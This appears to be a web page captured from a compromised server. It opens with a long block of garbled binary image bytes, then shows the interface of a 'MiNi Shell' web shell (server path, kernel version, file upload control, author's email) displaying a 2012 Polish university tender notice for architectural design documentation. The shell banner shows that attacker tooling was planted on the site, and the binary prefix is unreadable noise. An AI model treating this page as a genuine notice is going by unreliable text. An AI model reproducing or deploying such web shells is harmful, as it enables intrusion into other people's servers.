JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120704/145793-N-2012.html

<p class="kh_header"><b>Białystok: opracowanie projektu budowlanego oraz pełnobranżowej dokumentacji projektowej wykonawczej dotyczącej Akademickiego Centrum Kultury Politechniki Białostockiej przy ul. Zwierzynieckiej 10 w Białymstoku</b><br>
<b>Numer ogłoszenia: 145793 - 2012; data zamieszczenia: 04.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika  Białostocka , ul. Wiejska 45A, 15-351 Białystok, woj. podlaskie, tel. (085) 7469750, faks (085) 7469752.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pb.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> opracowanie projektu budowlanego oraz pełnobranżowej dokumentacji projektowej wykonawczej dotyczącej Akademickiego Centrum Kultury Politechniki Białostockiej przy ul. Zwierzynieckiej 10 w Białymstoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> A. Przedmiotem zamówienia jest:
Opracowanie projektu budowlanego oraz pełnobranżowej dokumentacji projektowej wykonawczej
dotyczącej Akademickiego Centrum Kultury Politechniki Białostockiej przy ul. Zwierzynieckiej 10 
w Białymstoku
(CPV - 71.22.00.00-6 - usługi projektowania architektonicznego)

Dokumentacja projektowa realizowana jest na potrzeby projektu PB składanego na konkurs 
w ramach Działania 13.1 Programu Operacyjnego Infrastruktura i Środowisko

B. Zakres przedmiotu zamówienia.
1.	Zakres przebudowy obejmuje  fragment budynku Stołówki zlokalizowanego  przy ul. Zwierzynieckiej 10  w Białymstoku zgodnie z załączoną koncepcją 
2.	Przedmiot zamówienia obejmuje  wykonanie:
I.	projektu budowlanego- w zakresie niezbędnym do uzyskania pozwolenia na budowę 
z wszystkimi niezbędnymi uzgodnieniami w ilości 5 egzemplarzy
     Każdy egzemplarz przygotowany powinien być z oryginalnymi pieczątkami i podpisami,

II.	pełnobranżowej dokumentacji projektowej wykonawczej:
a.	Projekt wykonawczy- architektura wraz z aranżacją wnętrz,
b.	Projekt wykonawczy zagospodarowania terenu,
c.	Projekt wykonawczy  konstrukcyjny,
d.	Projekt adaptacji akustycznej pomieszczeń wskazanych  przez zamawiającego, 
e.	Projekt wykonawczy instalacji c.o wraz z instalacją przyłączeniową do węzła cieplnego  usytuowanego w budynku, 
f.	Projekt instalacji ciepła technologicznego,
g.	Projekt wykonawczy instalacji wod.- kan. i p.poż. 
h.	Projekt wykonawczy instalacji wentylacji mechanicznej i klimatyzacji,
i.	Projekt wykonawczy instalacji elektrycznych wewnętrznych z liniami zasilającymi,
j.	Projekt wykonawczy instalacji oświetleniowej 
k.	Projekt wykonawczy instalacji gniazd ogólnego dostępu,
l.	Projekt wykonawczy instalacji gniazd sieci dedykowanej,
m.	Projekt wykonawczy instalacji okablowania strukturalnego,
n.	Projekt wykonawczy instalacji sygnalizacji pożaru,
o.	Projekt wykonawczy instalacji telewizji dozorowej dla wskazanych pomieszczeń ,
p.	Projekt wykonawczy instalacji urządzeń audiowizualnych we wskazanych    pomieszczeniach,
q.	Projekt wykonawczy instalacji włamania i kontroli dostępu,
r.	Projekty wykonawcze technologiczne niezbędne dla tego zakresu
s.    Projekt wykonawczy instalacji odgromowej, 
Każdy z w/w projektów wykonawczych należy opracować  w 6 egzemplarzach.

III.	specyfikacji technicznych wykonania i odbioru robót dla każdego z projektów wykonawczych -6 egz.
IV.	kosztorysów inwestorskich i przedmiarów robót dla potrzeb kosztorysów inwestorskich dla każdego z projektów wykonawczych -2 egz.
V.	wersji elektronicznej dokumentacji projektowo- kosztorysowej na CD-R po 1 egzemplarzu w formacie PDF i DWG dla każdego kompletu projektów.
VI.	Wizualizacji - 3 komplety (4 ujęcia) 


C.	INFORMACJE dotyczące prac projektowych
a.	Przewiduje się podłączenie obiektu do sieci wewnętrznych, których gestorem jest Politechnika Białostocka. Parametry sieci pozwalają  podłączyć projektowany fragment  budynku
b.	Uczelnia posiada moduł wyniesiony miejskiej centrali telefonicznej. Istniejący zapas numerów wewnętrznych pozwala na podłączenie bez konieczności  uzgadniania 
z operatorem.
c.	Zamawiający posiada prawa autorskie  do załączonej koncepcji.
d.	Zamawiający wymaga uzgodnienia zmian  koncepcji.
e.	 Wszelkie rozwiązania techniczne, standardy urządzeń, materiały wykorzystywane w przedmiotowej inwestycji musza być uzgadniane z zamawiającym.
f.	   W związku z tym, że dokonano już częściowej przebudowy budynku, zaś na inny fragment  budynku wykonano już dokumentację projektową z  uzyskaniem pozwolenia na budowę  może wystąpić konieczność  uzgadniania prac projektowych z innym biurem w zakresie rozwiązań technicznych w oparciu o powstałą już dokumentację projektową.

UWAGA !
Zgodnie z ustawą Prawo zamówień publicznych wszelkie materiały, które zostaną uwzględnione 
w/w projektach winny być opisane parametrami, tak aby możliwa była realizacja robót budowlanych w oparciu o powyższe projekty.

UWAGA !
Zamawiający dopuszcza niezbędną zmianę powierzchni projektowanych pracowni, wynikającą 
z obowiązujących  przepisów. Zmiana taka wymaga uzyskania pisemnej zgody Zamawiającego.

Wszelkie prace projektowe powinny być prowadzone w uzgodnieniu z użytkownikiem obiektu
i z Działem Eksploatacyjno-Budowlanym. Wszelkie uzgodnienia powinny być określone w formie pisemnej.

C. NADZÓR AUTORSKI

1.	Wykonawca  na czas realizacji  robót budowlanych na podstawie sporządzonej przez niego dokumentacji projektowej zobowiązany jest pełnić nadzór autorski w zakresie:
a)	kontroli zgodności realizacji Inwestycji z projektem w toku wykonywania robót, 
b)	uzgadniania i oceny zasadności wprowadzania rozwiązań zamiennych w stosunku do przewidywanych w projekcie, zgłoszonych w toku wykonywanych robót,
c)	udzielania stosownych wyjaśnień  odnośnie  wszelkich wątpliwości powstałych w toku realizacji Inwestycji oraz uzupełniania szczegółów projektowych,
d)	na każde żądanie Zamawiającego wizyty na terenie budowy i udział w naradach technicznych, 
e)	udziału  w odbiorze inwestycji.
2.	Nadzór autorski będzie pełniony w formie wizyt i konsultacji wynikających z potrzeb Zamawiającego 
w trakcie realizacji. 

Przewidywana liczba wizyt i konsultacji nie więcej niż 15. 
Dopuszcza się zwiększenie liczby wizyt i konsultacji. Strony ustalają, że w związku z dodatkową liczbą wizyt zostanie sporządzony aneks do umowy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 56.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca wykaże, że w okresie 3 lat, przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał z należytą starannością 
2 dokumentacje projektowe (dokumentacja pełnobranżowa) na obiekt o kubaturze co najmniej 6 000 m3, dotyczące budynków użyteczności  publicznej, dla których uzyskano pozwolenie na budowę,  
Oceny spełnienia warunków zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt. VI SIWZ. Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania i uznanie jego oferty za odrzuconą.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca zapewni (oświadczy), że osoby, które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia, tzn. będą to projektanci  z odpowiednimi uprawnieniami należący do właściwej izby samorządu zawodowego,
Oceny spełnienia warunków zamawiający dokona na podstawie złożonych przez Wykonawcę oświadczeń oraz dokumentów wskazanych w pkt. VI SIWZ. Niespełnienie któregokolwiek warunku spowoduje wykluczenie Wykonawcy z postępowania i uznanie jego oferty za odrzuconą.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wypełniona specyfikacja ofertowa zamówienia obrazującą pełny zakres wymaganej dokumentacji projektowej (wg załączonego do SIWZ wzoru - Załącznik Nr 3)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	wypełniony Formularz ofertowy (wg załączonego do SIWZ wzoru - Załącznik Nr 2),
2)	zobowiązanie do zapewnienia Zamawiającemu możliwości bieżących kontaktów z Wykonawcą w celu dokonywania uzgodnień w zakresie przedmiotu zamówienia z koordynatorem lub projektantem; wszelkie koszty związane z delegacjami pracowników Zamawiającego do Wykonawcy celem dokonania niezbędnych uzgodnień w ramach kontaktów związanych z realizacją przedmiotu zamówienia - ponosić będzie Wykonawca (na druku Formularza oferty),
3)	Oświadczenie o koordynatorze - projektancie uprawnionym do bezpośrednich kontaktów 
z Zamawiającym w celu dokonywania na bieżąco uzgodnień dotyczących przedmiotu zamówienia (na druku Formularza oferty),
4)	Oświadczenie Wykonawcy o nieodpłatnym przekazaniu, wraz z dokumentacją stanowiącą przedmiot zamówienia, majątkowych praw autorskich na rzecz Zamawiającego (na druku Formularza oferty),
5)	Oświadczenie o odbyciu wizji lokalnej  (wg załączonego do SIWZ wzoru -  Załącznik Nr 8 )

6)	Oświadczenie o udzieleniu min. 5 letniej gwarancji na całość zamówienia (na druku Formularza ofertowego)
7)	Oświadczenie o akceptacji zapisów zawartych w Załączniku Nr 9 do SIWZ - Wzór umowy (na druku Formularza oferty),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W przypadkach zaistnienia okoliczności, nie leżących po stronie Wykonawcy, a uniemożliwiających mu, dotrzymania terminu wykonania zamówienia lub też w istotny sposób utrudniające możliwość spełniania świadczenia w terminie, Wykonawca będzie mógł zwrócić się do Zamawiającego z uzasadnionym wnioskiem o przedłużenie terminu wykonania zamówienia. 
Dopuszcza się zwiększenie liczby wizyt i konsultacji. Strony ustalają, że w związku z dodatkową liczbą wizyt zostanie sporządzony aneks do umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pb.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Zamówień Publicznych
ul. Zwierzyniecka 6 pok. nr 4
15-333 Białystok.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2012 godzina 11:30, miejsce: Dział Zamówień Publicznych
ul. Zwierzyniecka 6 pok. nr 4
15-333 Białystok.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com